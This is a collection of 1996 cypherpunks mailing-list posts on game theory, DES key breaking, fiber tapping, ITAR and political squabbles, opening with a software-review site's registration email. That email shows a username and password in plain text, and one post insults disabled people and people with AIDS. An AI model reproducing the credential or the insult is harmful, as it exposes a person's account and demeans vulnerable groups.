Content-Type: text/plain


Hi Random!

Thank you for registering as a Benchin' member! You have the privilege
of reviewing software, participating in discussion groups, and winning
prizes!

Take this opportunity to help your fellow software seekers by reviewing
your share of software products. Do 25 and get your beanie!

At any Benchin' log-in screen type:
    User Name: rjnerd
    Password:  43095

You may want to change your password to one which is easier to remember.
Click on the "Members" menu item, then the "Log-In" link, and enter
your log-in. Then click the "Change Password" link.

And if you ever forget it, we can e-mail it to you! (Just click the
"Members" menu item and then "You forgot Your Log-In?")

Thank You!

 - The Benchin' Team
   (Have you earned your beanie yet?)

   Benchin' Software Review - http://www.benchin.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 26 Jul 1996 06:39:13 +0800
To: "cypherpunks" <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607251842.LAA25935@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jul 96 11:12:20 -0800, ichudov@algebra.com wrote:


>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?

First, the other nineteen shoot David Sternlight.  Then Perry and tcmay
get shot.  With the (now) absence of strong personalities to guide the
conversation among the remaining 8 robbers (should have shot tcmay
*before* he got his guard up) spend enough time arguing over trivialities
that the police show up and catch them all.

Moral: It is easier to herd cats than lead cypherpunks.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 05:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: Data Sources for DES Breaking
In-Reply-To: <199607242051.NAA13352@netcom5.netcom.com>
Message-ID: <RqPmRD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> Given that we might embark upon this public demonstration of the
> fragility of single DES, what should we use for test data?

If the goal is to show that the 40bit key used in s/mime is totally insecure,
then one could take some short plaintext likely to occur there and compute
a lookup table, listing its encryption with all possible keys - and make it
available on the internet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 26 Jul 1996 07:02:12 +0800
To: cypherpunks@toad.com
Subject: Re: Bare fibers
In-Reply-To: <Pine.BSF.3.91.960723170725.23791A-100000@mcfeely.bsfs.org>
Message-ID: <cJ89x8m9LseL085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.BSF.3.91.960723170725.23791A-100000@mcfeely.bsfs.org>,
Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:

> ob crypto/privacy: Anybody have a good idea for detecting a tap on 
> exterior fiber? I'd expect an attacker to have to interupt connectivity, 
> terminate both ends of a break, and insert an active device. Thoughts?

As has been mentioned earlier, all an attacker has to do is encourage
some of the light to exit the fiber, by bending it, contacting it with
a detector, etc.

If the detector is sensitive enough, the loss induced by this is minimal.

This sort of tapping is exactly the sort of thing quantum cryptography
is supposed to prevent, or at least identify.  Nothing short of quantum
methods is going to spot the tap, unless you happen to come across the 
tap by inspecting the entire length of the fiber.

- -- 
Alan Bostick               | [Spielberg's] latest is TWISTER, a film that
mailto:abostick@netcom.com | gives whole new meaning to the phrase "giant
news:alt.grelb             | sucking sound."  -- Patrick Taggart
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMffDPeVevBgtmhnpAQHftwL9HTNe4VUHlpRkOAYW1nKFwyw3cqkM+xXt
+zXOHuR52ffP1M2IZwTnPpBrBaXlCa6W+3uahnczVdJmAR/0MF5ksnh6bpjd+9IP
KmqnBG52X8f+HazUEygNJkRD1oVGlMTH
=FHZ5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 06:15:34 +0800
To: cypherpunks@toad.com
Subject: Re: When books are outlawed
In-Reply-To: <2.2.32.19960725031831.00da51a4@mail.teleport.com>
Message-ID: <V5PmRD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> writes:
> 
> Off Our Backs is a PC lesbian magazine.  "On Our Backs" is an S&M Lesbian
> magazine edited by Suzie Bright.  It is not anything resembling PC.  (Ms.
> Bright does not have a nice oppinion of Dwarkin and her fellow travelers, to
> put it mildly.)
(Alan's off-topic again, as usual.)

_On _Our _Wheelchairs is a PC rag for demented cripples dying from AIDS and tr
trying to stifle free speech. _Our _Favorite _Vegetable is the PC rag for their
supporers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 06:15:56 +0800
To: cypherpunks@toad.com
Subject: RE: Brute Force DES
In-Reply-To: <199607250338.UAA13937@toad.com>
Message-ID: <HDqmRD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Chris Adams" <adamsc@io-online.com> writes:
> >What's the cheapest form of storage, magtape? How much can you store on
> >magtape? The entries can be sorted so that lookup doesn't take long even
> >when you have to mount tapes. 
> 
> Hmmmm... Don't they have some of those 8mm tapes that go to 4-8GM per
> tape? Anyone have access to one?

One can also have an index to the data on faster storage: that's how I usually
store the data on tapes.

One note about these huge 8mm tapes (like the ones from Exabyte): random seeking
them is very slow.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 07:00:35 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: [Rant]Re: Shell buys key escrow system from TIS
Message-ID: <199607251921.MAA01459@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 AM 7/25/96 -0400, Jim Ray wrote:
>Will Rodger,<rodger@interramp.com>
>Washington Bureau Chief of Inter@ctive Week, wrote:
><snips>
>>Administration officials didn't return calls for comment, but it's clear
>>that the Clinton-Gore team have their first "testbed" for trying out key
>>recovery, or key escrow, proposals.
>
>Hmmm.  A new meme, "key recovery" is lots better than "key escrow," but
>I still wonder if I'm ever gonna see a journalist say, "'GAK,' or Govt.
>Access to Keys for cryptography."

I doubt we'll see many non-cyber-journalists saying "GAK", at least in print :-)
But the name "Clipper III" seems to be catching on fairly well,
which has the added benefit if connoting "yet another key-grabbing
attempt after the previous two failures", which I like a lot.

Key recovery is at least quasi-honest, unlike "key escrow";
I'd tend to call the Clintonista's scheme "key registration"
though I've generally found that "master key system" gets the point across
adequately.



#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Fri, 26 Jul 1996 06:46:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
In-Reply-To: <ae1bb4100d021004937f@[205.199.118.202]>
Message-ID: <m2g26grv3f.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Hello, Tim,

I found your essay interesting, but would like to describe a 
hypothetical situation and my ideas of how your notion of Schelling 
points applies to you to see if I am correctly following your ideas:

Suppose that I live in a rural area and 
I know that my neighbour beats his children because I have seen them with 
bruises before and too many times just to be from household accidents. 
Since I am far enough away from him, the beating does not make enough noise
to distrub me from any of my activities. I am also planning on 
moving in three years, so there is little danger that I will be a
victim if the children develop into violent criminals due, in part,
to their abuse. In this case, the "least action" reasoning seems to 
tell me to do nothing. 

On the other hand, the state might do some sort of calculation like
the following: 

(probability the children will become violent criminals) x
(cost of dealing with violent criminals)
-(cost of taking the children from the parent)

to see if intervention is warranted. This is already a simple
application of utilitarianism, however, so that the introduction of the 
notion of Schelling points to explain state intervention seems
unnecessary. 

One the hand, the theory does seem distinguishable from utilitarianism for 
explaining the likely behaviour of the other neighbours of the beater:
Cosinder ones who will be living in the area for quite some time. They
are more likely to later become victims of violent crime (either from the
beater or the children) so would have a greater probability of 
intervening than others. However, it seems that no intervention can be 
justified on notion of Schelling points unless

(probability the children will become a violent criminal) x
(cost of children's crimes to me if they do)
-(cost of person acting now)

is positive. (Of course, people will have diffent estimates of the costs
and probability affecting whether or not they act). A utilitarian, 
however, would have to do the same calculation as the state to determine 
whether or not it was right to act, so would be more likely act,
because the utilitarian needs to consider the cost to everyone, not
just to him or herself. 

Am I following your ideas ok? :) 

-- 
Leonard Janke (janke@unixg.ubc.ca)
NEW pgp key id 0x6BF11645 (0xF4118611 eaten by /dev/fd0 :( ) 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Fri, 26 Jul 1996 07:52:16 +0800
To: "'snow'" <snow@smoke.suba.com>
Subject: RE: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960725194208Z-41731@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


snow writes:

>
>On Wed, 24 Jul 1996, Bill Olson (EDP) wrote:
>> Alan Horowitz writes:
>> >Phil,
>> >are you saying that you're a better businessman than Rush Limbaugh?
>> >Can we see some 1040's, please?
>> 	
>> Rush Limbagh is a big fat *RICH* idiot.
>
>     Big? yes. 
>     Fat? I'd say so.
>     Rich? In relation to me, yes, and probably to you.
>
>     Idiot? The man _got_ rich doing something he enjoys and is good at,
>meanwhile you are working for the great satan. Who is the Idiot?

Yes, I work for satan. But I am wealthy because of it. Nice guys finish
last. My emphasis was that he was rich, not that he was an idiot.
Personally, I think the guys an asshole, but I commend him for his
capitolist efforts.

BTW - I'm an idiot. Never said I wasn't.

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 26 Jul 1996 04:09:17 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960724192714.675F-100000@crl14.crl.com>
Message-ID: <9607251646.AA07787@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I'm still rather amused by the terms of your bet, $50 vs 25L.
At current exchange rates 25 Lire is more like 2 cents.

I thought I had already given my 2 cents.


Given that this is a public newsgroup, and the one most
likely to be read by spooks and the FBI I would have to be 
almost as stupid as Rush to accept any bets on it. Its called
illegal interstate gambling.


	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@galaxy.galstar.com (Igor Chudov)
Date: Fri, 26 Jul 1996 06:11:32 +0800
To: cypherpunks@toad.com
Subject: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <199607251813.NAA02650@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text


Igor Chudov wrote:
> 
> Here's a puzzle for our game theorists.
> 
> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> how they plan to split the money: they stay in line, and the first guy
> suggests how to split the money. Then they vote on his suggestion. If
> 50% or more vote for his proposal, his suggestion is adopted.
> 
> Otherwise they kill the  first robber and now it is the turn of guy #2
> to make another splitting proposal. Same voting rules apply.
> 
> The question is, what will be the outcome? How will they split the
> money, how many robbers will be dead, and so on?
> 

I forgot to say what the GOALS are. The goals of every individual
cypherpunk are (in from highest to lowest priority): 

1. Stay alive
2. Get as much money as possible
3. Keep as many cypherpunks alive as possible, all other things being equal.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 26 Jul 1996 08:23:26 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607241624.AA06524@Etna.ai.mit.edu>
Message-ID: <Pine.3.89.9607251251.A18211-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:

> 
> >Talk shows that attempt to stimulate active thought on reasonable premise 
> >generally do not survive long in syndication. With Limbaugh's show, it 
> >took a double hit as the markets it played to were for the most part late night. 
> >BTW, this comes from actually looking it up in past TV Guides - not 
> >mindlessly drooling over the radio - so put away the "he's lying" crap.
> 
> And why did the networks put Rush on so late? Could it be that
> he did not pull in the viewers?

Syndicated shows are scheduled by the local broadcasters. They decide 
when and if to run them. It only makes sense that if you have control 
over your material but are at the mercy of the broadcaster, that is not a 
sound business position to remain in.

> 
> >Following the shallow logic of your argument, Limbaugh is not a success 
> >because he does not broadcast on TV. 
> 

I noticed you clipped the truism about academia...

> It is shallow logic, but it is Rush's own logic. He promotes the
> idea that success is measured in ecconomic terms. The failure of his
> TV show demonstrates the failure of his ideas under the criteria 
> which he himself espouses.
> 

Maybe in your book, but your above statement demonstrates that: a) you know 
very little about how the TV broadcast market works, b) you are confusing 
the issue of business with political stance, c) that you assume to 
understand what makes a person financially successful, when infact you have 
said nothing here to demonstrate such knowledge, and d) your bank account 
is much smaller than his, otherwise you wouldn't piss and moan about 
Limbaugh's financial status in the first place.

> >The issue I take with this, is the constant spouting of King Bill's 
> >pronouncement of why OKC occured in the first place. We don't know WHY it 
> >took place - that's what a trial is for (if you actually believe that 
> >justice is blind and lawyers tell the truth always). We will NEVER really 
> >know - but it's damn fine political fodder to take an unconstitutional 
> >swipe at the populous with the anti-terrorist legislation.
> 
> That is not what the trial will decide. The question is who and what,
> why is irrelevant given the nature of the offense.
> 

Maybe in the UK, but in the US there is the little thing called motive. 
It either helps or hurts one's final outcome in the court system.

> >If you firmly believe the premise that Fascism was the root cause behind 
> >OKC, then you have no choice but to look to the White House and Capital 
> >Hill. 
> 
> Nope, I look to the millitas, Chritian Identity, the Klu Klux Klan 
> and their appologists including Liddy and Limbaugh. If you read
> the propaganda that the NAZIs used you will find it if anything 
> less direct than Liddy or Buchannan. The NAZIs did not advertise their
> intention to commit mass murder, they used code words. When Buchannan
> refers to "Hose" he is using a codeword he knows will be understood.
> 

Well, that's your take on politcs, and a very narrow view that it is.

Obviously there is more to American Politics than Pat Buchanan, and 
frankly I would doubt very seriously he had anything to do with Fascism 
and the US Government. In a former life, he was a reporter and columnist 
in the press (one of the self-anonted guardians of free speech). He never 
set policy, just did his journalistic spin on it.

If anything, Buchanan is reminicient of the protectionist days of the 
1930's prior to US entry into WWII. Back then Hitler was a European 
problem that got out of hand quickly. And, if it wasn't for the fact that 
France and Great Brittain tried to beggar Germany after Kaiser Willhelm 
surrendered, Hitler and the NAZI's may not have come to power. 

I would suggest you study your American history more carefully and 
without the grandstanding and speeches of the revisionists who pass 
themselves off as educators and political analysts.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 07:58:16 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Netscape
Message-ID: <199607252024.NAA17509@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:15 PM 7/25/96 +0000, The Deviant wrote:
>hOn Wed, 24 Jul 1996, jim bell wrote:

>> That still doesn't make sense.
>> First, there were laws.  And we had to obey them.
>> Then, they added ITAR.  And they want us to obey it.
>> Finally, it seems, they're giving us "guidelines."  Not law, Not ITAR.
>> Next it's gonna be their their fondest desires, their preferences,and 
>> finally their whims.
>> What's wrong with this picture?    Do I detect an ass-kissing contest?
>
>Yup.. thats it.  And they said I was an idiot when I [Correctly] said
>that Netscape wasn't activly fighting the ITAR.

Agreed.  Writing good crypto is certainly praiseworthy and desirable, but it 
does not "fight ITAR," per se.  (It fights lack of crypto, which is not the 
same thing!  Lack of crypto certainly needs to be fought, as well.)

Writing the software and selling it domestically is, at best, 
"ITAR-neutral."   Putting it on the net in the most unrestrictive way the 
State Department has previously approved of is also "ITAR-neutral."  
(Because such a method is, presumably, within the rights of anyone; we can 
conclude this because "the State Department said so.")

A _PRO_-ITAR stance is one in which a company or person puts restrictions on 
his distribution of that software above and beyond what have historically 
been approved, particularly when prior distributions of software are still 
going on with those previously-approved restrictions. They may be absolutely 
entitled to do so, but that's still pro-ITAR.  For a small and uninfluential 
company, the significance of doing that is minor, but for Netscape, it's 
crucial because it practically invites the government to set a new precedent 
beyond what they (the government) previously thought they might get away with.


 
>> You should have told them that if they're "evaluating their guidelines" that 
>> means that NO future modifications to those guidelines is binding on you, 
>> since it is not part of ITAR and is CERTAINLY not part of the law.  You 
>> should have memorialized the contact with a lawyer's letter, and promptly 
>> posted the new version of your software with whatever version of the 
>> precautions  (MIT, RSA, or?) you felt most happy with.
>> 
>
>Or even better... Lets look at this version...
>
>lets say I get my internet service from MCI.  Now lets say I put crypto on
>my web page.  When somebody from out of the country visits my web page,
>and downloads it, who's exporting it?  Them, MCI, or me?  I'd say they
>are, and I doubt ITAR covers this... this is one of those things thats
>covered in "guidelines". ;) umm.... Smooch Smooch?

Yes, if we really oppose ITAR, we should kill it by insisting that the 
government fully document it at every turn.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 11:15:33 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607252105.OAA19656@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 PM 7/25/96 -0400, Simon Spero wrote:
>On Thu, 25 Jul 1996, jim bell wrote:
>> My guess?  They all agree to kill whoever made that suicidal rule.  
>> Otherwise, all but two would end up dead.
>
>But the people at the start of the line know that if they don't 
>hang together, they will end up dead, and if that they act purely 
>selfishly only the last two will benefit. Because they want to stay 
>alive, a better solution for the first person to propose equal shares, 
>which would be opposed by the last two players, but supported by the rest.
>He could also split the money only amongst the first half of 
>the gang, since he only needs half the votes.

Yes, my answer was quick, flip, and partly wrong.  It turns out the answer is probably indeterminate, because the amount people want to live is indeterminate.  Consider:


If two were left, #2 would get everything by the rules.  (he would propose, "I get everything!"  The vote would be 1-1, or 50%, which would win.)

If three were left, #2 knows that if #3 is eliminated, he would win as above.  #1 knows this as well, and is motivated to make a deal with #3 to prevent this.  #3 is also motivated to deal, because if he can't get an agreement he's not only out of the money, he's dead.  How they choose to split up the money is unknowable, I suspect, because of the "death" aspect.  #3 could also deal with #2 if #1's terms were onerous.  This problem would be simpler to analyze (and probably determinate) if anyone whose proposal was rejected was simply out of the game, rather than dead.


There's another complicating aspect. Voting order is important.  According to the rules, #3 must make a proposal, which needs to be voted on.  Obviously, #3 will vote for it.  But even if he's come to some agreement with #2, will #2 vote yes?  If #2 votes no, 3's gone and #2 wins everything.   So #3 couldn't trust #2 to vote yes. particularly if #2 voted last.  If #1 voted last, and #2 defected, #1 might vote for it, _IF_ it was more desireable than "zero" for him.

Could #3 make a proposal like this:  "I propose that the money be split up among all who vote for this proposal."   #1 would have to vote for it, else he'd get nothing.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 26 Jul 1996 06:25:02 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960725103020.4428A-100000@crl4.crl.com>
Message-ID: <9607251827.AA07862@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>That's L25, not 25L.  I though Phil was a UK "subject," thus
>I proposed a wager of 25 Pounds Sterling.  Clear enough?

The generaly accepted abreviation is GBP.

>If Phil wants to do it all in US dollars then I will bet US$50
>against his US$45.  

How about hard currency? I prefer Swiss francs (CHF).


>If Phil really believes he and I are at any credible legal risk 
>for a making such a personal wager, he is a fool.  If he really
>knows better (my best guess), then he is intellectually dishonest 
>and a moral coward.

The moral point is not that there is risk of being caught, it
is that society has made laws and unless there are exceptional
circumstances it is a duty to obey those laws.

I don't argue against breaking laws which are immoral, indeed 
I am still refusing to pay a Poll tax bill from the UK despite
the fact that the amount outstanding is inconsequential.


>I again invite Phil to put up or shut up.


You sound like an 18th century fop challenging someone to a duel.

I do not believe that Aristotle listed "challenging to a bet"
as one of his modes of reason.


Rush has been rejected by the very free market principles he
espouses which destroys his case through self contradiction.
On the other hand I have not asserted that premise, arguments
ad pecuniam are therefore irrelevant.


The fact remains that the lack of Rush on TV has an explanation
considerably less charitable than Rush's claim. Whether Rush 
returns to TV or not is of very little interest to me except
insofar as it would reduce the already sparse options for
TV entertainment in Cambridge.

Would you believe that Continental is so lame that they do not
offer either the Sci-Fi channel nor the comedy channel in the
home town of MIT and Harvard? If I had realised that NBC 
Olympic coverage would be as bad as it is I might have got a
satelite dish to pick up the feed from Astra.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jul 1996 06:43:26 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607251702.KAA06172@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960725145850.4418B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996, jim bell wrote:
> My guess?  They all agree to kill whoever made that suicidal rule.  
> Otherwise, all but two would end up dead.

But the people at the start of the line know that if they don't 
hang together, they will end up dead, and if that they act purely 
selfishly only the last two will benefit. Because they want to stay 
alive, a better solution for the first person to propose equal shares, 
which would be opposed by the last two players, but supported by the rest.
He could also split the money only amongst the first half of 
the gang, since he only needs half the votes.

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Fri, 26 Jul 1996 06:46:56 +0800
To: cypherpunks@toad.com
Subject: RE: Distributed DES crack
Message-ID: <TCPSMTP.16.7.25.15.7.34.2645935021.656132@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 >>  half that time...and a slim chance that we will get it with the first
 >>  try...

 > My figures were based on 2^55 tries, which is exactly half of 2^56.


 Ahhh... OK.

 P.J.
 pjn@nworks.com


... Open mouth, insert foot, echo internationally.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 11:30:18 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607252223.PAA24106@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 PM 7/25/96 -0400, Simon Spero wrote:
>On Thu, 25 Jul 1996, jim bell wrote:
>> My guess?  They all agree to kill whoever made that suicidal rule.  
>> Otherwise, all but two would end up dead.
>
>But the people at the start of the line know that if they don't 
>hang together, they will end up dead, and if that they act purely 
>selfishly only the last two will benefit. Because they want to stay 
>alive, a better solution for the first person to propose equal shares, 
>which would be opposed by the last two players, but supported by the rest.
>He could also split the money only amongst the first half of 
>the gang, since he only needs half the votes.

My previous answer was incomplete, of course.  I continue to believe that 
the problem is unsolveable as stated, if for no other reason than the 
"weight" of the negative represented by dying is not stated.  It's a VERY 
complex problem, unless there's some trick I'm not seeing.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Fri, 26 Jul 1996 11:12:11 +0800
To: cypherpunks@toad.com
Subject: Re: CD Prices and Inflation
Message-ID: <199607252246.PAA11703@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 26,  5:06am, Timothy C. May wrote:
> Something not being talked about in any of the messages I've seen is the
> role of _inflation_. Those claiming CD prices are "too high" should
> consider inflation.

Good argument, but I think you're still paying more.
Some have made the argument that the cost of manufacture 
of a CD is less (I wouldn't know).  Most people pay considerably
more taxes for that new platter, too. Sales tax is 6% or more now,
was 2-3% then for most people, other taxes have gone way up too.  You
probably had to earn $28 to bring home that $16 cd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 26 Jul 1996 09:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607252305.QAA06996@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the best way to approach this problem is to first try to solve
it assuming there are only two robbers rather than 20.  Then once you
have that figured out, try it for three, then four, and so on.  Keep in
mind that 50% support is enough for a proposed distribution to pass, you
don't need a strict majority.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Fri, 26 Jul 1996 10:24:01 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <Pine.BSI.3.93.960725162632.2394B-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Assuming "perfect" intelligence on the part of the robbers (i.e. they will
follow deterministic behavior and do the "right" thing), then here's what
must happen IMO (1 being the first guy and 20 being the last):

1 must propose that 1, 3, 5, 7, 9, 11, 13, 15, 17, and 19 all split
the money evenly. All of these will vote for it, assuming they're all
perfectly smart and deduce the inevitable outcome.

I arrived at this working backward from the case where two robbers are left.

If 2 are left (19 & 20), 19 gets all the money. So 20 will vote for whatever
18 says, which MUST include 20 in the deal. Since 19 knows this, 19
will vote for whatever 17 says, which must include 19 in the deal, and so
forth. Eventually you arrive at the conclusion that 1,3,5...,19 must
all agree to split the money at the beginning.


On Thu, 25 Jul 1996, Igor Chudov wrote:

> Igor Chudov wrote:
> > 
> > Here's a puzzle for our game theorists.
> > 
> > Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> > how they plan to split the money: they stay in line, and the first guy
> > suggests how to split the money. Then they vote on his suggestion. If
> > 50% or more vote for his proposal, his suggestion is adopted.
> > 
> > Otherwise they kill the  first robber and now it is the turn of guy #2
> > to make another splitting proposal. Same voting rules apply.
> > 
> > The question is, what will be the outcome? How will they split the
> > money, how many robbers will be dead, and so on?
> > 
> 
> I forgot to say what the GOALS are. The goals of every individual
> cypherpunk are (in from highest to lowest priority): 
> 
> 1. Stay alive
> 2. Get as much money as possible
> 3. Keep as many cypherpunks alive as possible, all other things being equal.
> 
> 	- Igor.
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfgENS/fy+vkqMxNAQEauAP+Ns7g50LTtdRmLg8/ffoveH6x6o/ml6a8
ELGw6/gA0oRq81gVDA/q48uUDOK3+RirV+HcAnB3/QobocxgqftOvcpwk6ewCLOB
bh0f2u8OpcXd/ArrC+Upi4l87Eo1IONDudsluaEVYCBX6cTmyrK3kRskjue/3Xr6
I0UIlz6UxFE=
=lvhl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 26 Jul 1996 02:23:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: NOISE: Rand and smoking Re: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.)
In-Reply-To: <ae1ac7c2020210040e54@[205.199.118.202]>
Message-ID: <199607251456.QAA18357@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Someone like Tim wrote something like:
>
<snip>
> I think
> some of her essays in her Objectivist Newsletter had explained why smoking
> was essentially de rigeur.
> 
<snip>
> Rothbard
> wrote an article for "Liberty," circa 1986-8, which is where I read the
> details. Also, I believe Barbara Branden's biography of Rand dealth with
